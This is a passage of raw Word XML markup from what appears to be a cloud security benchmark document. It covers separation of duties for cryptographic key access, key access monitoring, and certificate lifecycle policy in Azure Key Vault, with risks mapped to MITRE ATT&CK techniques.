        <w:t xml:space="preserve"> and restore keys to maintain key availability across regions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5BFE99" w14:textId="7791CA38" w:rsidR="005D705E" w:rsidRPr="00E14EE7" w:rsidRDefault="005D705E" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005D705E">
        <w:t>Document and test disaster recovery procedures with defined RTO/RPO targets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EC046A" w14:textId="77777777" w:rsidR="00105F1F" w:rsidRDefault="00105F1F" w:rsidP="00105F1F"/>
    <w:p w14:paraId="0D6BFCC1" w14:textId="3BFF0136" w:rsidR="00105F1F" w:rsidRDefault="005D705E" w:rsidP="005D705E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D705E">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DP-6.3: Enforce separation of duties for key access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAB4DB8" w14:textId="6BCE95F4" w:rsidR="005D705E" w:rsidRDefault="005D705E" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005D705E">
        <w:t>Prevent insider threats and privilege abuse by separating key management roles from cryptographic operation roles, ensuring no single identity can both create keys and use them for data encryption or decryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA30A26" w14:textId="53566F9C" w:rsidR="005D705E" w:rsidRDefault="005D705E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005D705E">
        <w:t>Enforce separation of duties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5064D408" w14:textId="77777777" w:rsidR="005D705E" w:rsidRDefault="005D705E" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Implement role-based access control (RBAC) or access policies to enforce separation of duties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47270C40" w14:textId="77777777" w:rsidR="005D705E" w:rsidRDefault="005D705E" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Separate roles for key administrators (who can create/rotate/delete keys but cannot perform cryptographic operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400DDFD2" w14:textId="77777777" w:rsidR="005D705E" w:rsidRDefault="005D705E" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Separate roles for key users (who can perform encrypt/decrypt operations but cannot manage keys).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681487FE" w14:textId="6F505CB1" w:rsidR="005D705E" w:rsidRDefault="005D705E" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Example roles: Key Vault Crypto Officer (administrators), Key Vault Crypto User (applications/users)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015A26FB" w14:textId="0C910971" w:rsidR="005D705E" w:rsidRDefault="005D705E" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005D705E">
        <w:t>Verify that no single identity has both administrative and operational key access to prevent privilege abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69105815" w14:textId="44294E90" w:rsidR="005D705E" w:rsidRDefault="005D705E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005D705E">
        <w:t>Monitor key access and maintain inventory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AB8DD0" w14:textId="77777777" w:rsidR="005D705E" w:rsidRDefault="005D705E" w:rsidP="00544DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Integrate key access monitoring with Microsoft Sentinel to detect anomalies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786C30D6" w14:textId="77777777" w:rsidR="005D705E" w:rsidRDefault="005D705E" w:rsidP="00544DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Unusual key access patterns (access from unfamiliar IP addresses or regions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699A7E7F" w14:textId="77777777" w:rsidR="005D705E" w:rsidRDefault="005D705E" w:rsidP="00544DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Bulk key operations (excessive operations within short time periods).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF975B7" w14:textId="57C5DA1A" w:rsidR="00105F1F" w:rsidRDefault="005D705E" w:rsidP="00544DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Off-hours administrative changes (key deletion or rotation outside business hours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102D1F8C" w14:textId="071B441B" w:rsidR="005D705E" w:rsidRDefault="005D705E" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005D705E">
        <w:t>Maintain a key inventory tracking key name, purpose, rotation schedule, and dependent services. Review inventory regularly during security reviews</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1229824A" w14:textId="77777777" w:rsidR="00105F1F" w:rsidRDefault="00105F1F" w:rsidP="00105F1F"/>
    <w:p w14:paraId="0A3AA5A8" w14:textId="77777777" w:rsidR="0086146A" w:rsidRDefault="0086146A" w:rsidP="00105F1F"/>
    <w:p w14:paraId="0760C9FF" w14:textId="77777777" w:rsidR="0086146A" w:rsidRDefault="0086146A" w:rsidP="00105F1F"/>
    <w:p w14:paraId="40646C14" w14:textId="77777777" w:rsidR="0086146A" w:rsidRDefault="0086146A" w:rsidP="00105F1F"/>
    <w:p w14:paraId="129487DA" w14:textId="6738B287" w:rsidR="0086146A" w:rsidRDefault="0086146A" w:rsidP="0086146A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc242449510"/>
      <w:r w:rsidRPr="0086146A">
        <w:t>DP-7: Use a secure certificate management process</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="68215648" w14:textId="215A1862" w:rsidR="000737AC" w:rsidRDefault="000737AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2514A74B" w14:textId="46AE99A5" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00544DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Manage certificate lifecycles through centralized processes that include inventory, automated renewal, strong cryptographic standards, and timely revocation. Ensure certificates for critical services are tracked, monitored, and renewed before expiration to prevent service disruptions and maintain secure encrypted communications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A86714" w14:textId="5B73630C" w:rsidR="000737AC" w:rsidRDefault="000737AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000737AC">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7A6674E8" w14:textId="0A267E13" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Unexpected expirations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232FCBC4" w14:textId="4C3A99FF" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Lapsed certificates trigger production outages, breaking APIs, identity federation, or client trust paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5789CDE5" w14:textId="4EEB3EB0" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Weak cryptography persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF56B7E" w14:textId="0C10412F" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Legacy key sizes / signature algorithms (e.g., SHA-1, RSA &lt; 2048) remain in use beyond deprecation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556D76F9" w14:textId="1A33A6C0" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Wildcard &amp; self-signed abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308DDE5B" w14:textId="09196A7A" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Broad-scope or unmanaged self-signed certs enable lateral impersonation and TLS downgrade risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D35492A" w14:textId="27C08D22" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Undetected compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264967F9" w14:textId="2EFBCEEC" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Stolen private keys allow transparent man</w:t>
      </w:r>
      <w:r w:rsidRPr="000737AC">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="000737AC">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="000737AC">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="000737AC">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="000737AC">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="000737AC">
        <w:t>middle or traffic decryption until rotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD3092B" w14:textId="2AC79C0C" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Shadow certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71278BC8" w14:textId="63C53FAF" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Unsanctioned issuance outside approved CAs fragments governance and increases revocation blind spots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D36FE86" w14:textId="64656405" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Manual renewal errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400AE2E2" w14:textId="71CF8F06" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Inconsistent replacement sequencing causes trust chain mismatches and partial environment drift</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594958A6" w14:textId="266B7F6A" w:rsidR="000737AC" w:rsidRDefault="000737AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD06B34" w14:textId="54E40EAD" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC1BD5D" w14:textId="4BCED17B" w:rsidR="00922E38" w:rsidRDefault="00922E38" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00922E38">
        <w:t>subvert trust controls (T1553) issuing or introducing fraudulent / rogue certificates to bypass validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9EBD0A" w14:textId="149BBAC7" w:rsidR="00922E38" w:rsidRDefault="00922E38" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00922E38">
        <w:t>weaken encryption (T1600) continuing use of obsolete signature algorithms reducing verification assurance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AD019F" w14:textId="7FA0D7FC" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Resource Development (TA0042)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747FD468" w14:textId="51D50DC5" w:rsidR="00922E38" w:rsidRDefault="00922E38" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="384"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00922E38">
        <w:t>develop capabilities (T1587) forging certificates or tooling for future intrusion phases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624860CE" w14:textId="699BD9AE" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A93643" w14:textId="4A30A893" w:rsidR="00922E38" w:rsidRDefault="00922E38" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="385"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00922E38">
        <w:t>unprotected credentials (T1552) extracting private keys from insecure file stores or process memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21691918" w14:textId="2BE6E450" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8BF222" w14:textId="25D9574F" w:rsidR="00922E38" w:rsidRPr="000737AC" w:rsidRDefault="00922E38" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00922E38">
        <w:t>modify authentication process (T1556) rewriting certificate-based auth flows to embed long-lived access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6236D0A0" w14:textId="3DD4054B" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="000737AC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DP-7.1: Establish certificate policies and CA integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51192B8E" w14:textId="18B3CB19" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Define certificate governance standards and integrate trusted certificate authorities to ensure consistent cryptographic quality and automated issuance across your infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799ADAE6" w14:textId="200E70C1" w:rsidR="000737AC" w:rsidRDefault="000737AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Establish certificate management infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD2ECA1" w14:textId="7092EBFF" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Use Azure Key Vault to centrally manage the complete certificate lifecycle: creation, import, renewal, rotation, revocation, and secure deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0C761D" w14:textId="77777777" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Define certificate policies in Azure Key Vault to enforce organizational security standards:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251C01B1" w14:textId="77777777" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Key type and size: RSA 2048-bit minimum (recommended: 3072-bit or 4096-bit for long-lived certificates); EC P-256 or higher for elliptic curve certificates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E799DE5" w14:textId="77777777" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Signature algorithm: SHA-256 or stronger (prohibit SHA-1 and MD5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAB35AD" w14:textId="77777777" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Validity period: Maximum 397 days for public TLS certificates (per CA/Browser Forum baseline requirements); shorter durations (90 days) recommended for reduced exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43695019" w14:textId="753725BB" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Certificate authority: Use only approved, integrated CAs (DigiCert, GlobalSign) or your organization's private CA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC90A5A" w14:textId="5939F0B2" w:rsidR="000737AC" w:rsidRDefault="000737AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>Integrate certificate authorities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A89193" w14:textId="77777777" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Use partnered Certificate Authorities integrated with Azure Key Vault for public TLS/SSL certificates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE566AE" w14:textId="77777777" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>DigiCert: Organization Validated (OV) TLS/SSL certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104F4F45" w14:textId="0AA0F67C" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>GlobalSign: Organization Validated (OV) TLS/SSL certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E737E5" w14:textId="71953E89" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000737AC">
        <w:t>For private/internal services, integrate your organization's internal Certificate Authority (e.g., Active Directory Certificate Services - ADCS) with Azure Key Vault for automated certificate issuance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C93C53F" w14:textId="77777777" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Avoid self-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>signed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
